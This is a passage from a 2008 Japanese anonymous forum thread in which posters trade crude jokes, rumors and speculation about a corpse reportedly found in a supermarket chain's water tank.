死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水
死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水

89 :名無しさん@九周年:2008/12/03(水) 13:53:36 ID:L+3rWS+m0
>>59
水死体は海綿体が水蓄えてオッキオッキしてしまうのか?w

90 :名無しさん@九周年:2008/12/03(水) 13:53:38 ID:U/J6lMTHO
某ショッピングセンターでも大活躍!


死体が浮いてても 完 全 消 毒


お問い合わせは取扱店又は弊社お客様窓口まで

91 :名無しさん@九周年:2008/12/03(水) 13:53:43 ID:e4bEIUcA0
たとえおっさんが液状化しても
そんな固形物が末端で出てくることはありえん
普通にラーメン屋に文句いえ

92 :名無しさん@九周年:2008/12/03(水) 13:53:48 ID:aACLhf7m0

事故発生直後の歯科医はヤバイだろ。激ヤバだろ。

マーム歯科医院
http://www.matsusaka-marm.com/marmshika/

死亡一ヵ月後の水質は問題なくても、死亡直後の水は確実に汚染されてるだろ。

さっさと事故発生日を特定しろよ。
歯科医はカルテ残ってるんだから、事故発生後に診察した人間は全員特定できるだろ。
その全員を大至精密検査しろよ。

これは医療事故だよ。対策は医療機関としての義務だよ。



93 :名無しさん@九周年:2008/12/03(水) 13:53:50 ID:SXx3aTpH0
>>83
鶏や豚の死体でダシとってるんだから間違いじゃないだろう

94 :名無しさん@九周年:2008/12/03(水) 13:53:55 ID:f/2bhW2EO
>>74
>未来永劫に都市伝説化すると思う。

なんかツボに入ったw
地元の小中学校で語り継がれるんだろうな…

95 :名無しさん@九周年:2008/12/03(水) 13:54:00 ID:xPKtNnIy0
物凄い数の工作員が沸いてるけど、やっぱ民主党が金だしてんの?

96 :名無しさん@九周年:2008/12/03(水) 13:54:03 ID:EBV7PtLj0
勝谷と青山は知ってるかな?

97 :名無しさん@九周年:2008/12/03(水) 13:54:10 ID:FiheClnb0
スーパーってパック買えば飲料水が無料で貰えるのがあるけど
あれもこの水なのかな?

98 :名無しさん@九周年:2008/12/03(水) 13:54:16 ID:whz+PeP2O
いいか?



民放はこれを報道することによって、イオンの報復でCMがストップすることを恐れている。


お前らが散々叩いている国営放送は政治家からの圧力がない限り公正な報道をする。


非難すべきは国営じゃないだろ?

99 :名無しさん@九周年:2008/12/03(水) 13:54:20 ID:zQWen5AO0
もう都市伝説になるのは確定したな

「ジャスコの貯水槽には死体が浮いている」

下手に隠蔽したせいで他のジャスコまで悪影響

100 :名無しさん@九周年:2008/12/03(水) 13:54:38 ID:lcIF/khbO
腐っ(^ω^≡^ω^)腐〜♪

251 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)